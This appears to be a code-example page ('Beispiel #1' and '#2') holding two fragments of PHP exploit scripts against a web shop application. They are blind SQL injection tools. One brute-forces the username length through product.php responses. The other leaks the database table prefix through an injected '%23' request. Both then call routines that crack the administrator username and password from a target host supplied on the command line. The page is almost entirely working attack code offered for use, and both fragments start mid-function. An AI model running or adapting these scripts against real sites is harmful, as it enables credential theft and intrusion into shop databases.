Beispiel #1
0
{
    echo "[+] username length: ";
    $exit = 0;
    $length = 0;
    $pos = 1;
    $chr = 0;
    while ($exit == 0) {
        $response = exploit($hostname, $path, $pos, $chr, $chs, $goodid);
        if (preg_match("/javascript:addToCart/i", $response)) {
            $exit = 1;
            $length = $pos;
            break;
        } else {
            $pos++;
            if ($pos > 20) {
                exit("Exploit failed");
            }
        }
    }
    echo $length . "\n";
    return $length;
}
if ($argc != 4) {
    usage();
}
$hostname = $argv[1];
$path = $argv[2];
$goodid = $argv[3];
$length = lengthcolumns($hostname, $path, 3, $goodid);
crkusername($hostname, $path, 1, $goodid);
crkpassword($hostname, $path, 2, $goodid);
Beispiel #2
0
    $conn = fsockopen($hostname, 80);
    $request = "GET {$path}/product.php?q=&action=searchlist&where=%23 HTTP/1.1\r\n";
    $request .= "Host: {$hostname}\r\n";
    $request .= "Connection: Close\r\n\r\n";
    fputs($conn, $request);
    while (!feof($conn)) {
        $reply .= fgets($conn, 1024);
    }
    fclose($conn);
    preg_match('/FROM `(.+)yp_product/ie', $reply, $match);
    if ($match[1]) {
        return $match[1];
    } else {
        return false;
    }
}
if ($argc != 3) {
    usage();
}
$prefix = "";
$hostname = $argv[1];
$path = $argv[2];
$prefix = getprefix($hostname, $path);
if ($prefix) {
    echo $prefix . "\r\n";
    $length = lengthcolumns($hostname, $path, 3);
    crkusername($hostname, $path, 1);
    crkpassword($hostname, $path, 2);
} else {
    exit("Exploit failed");
}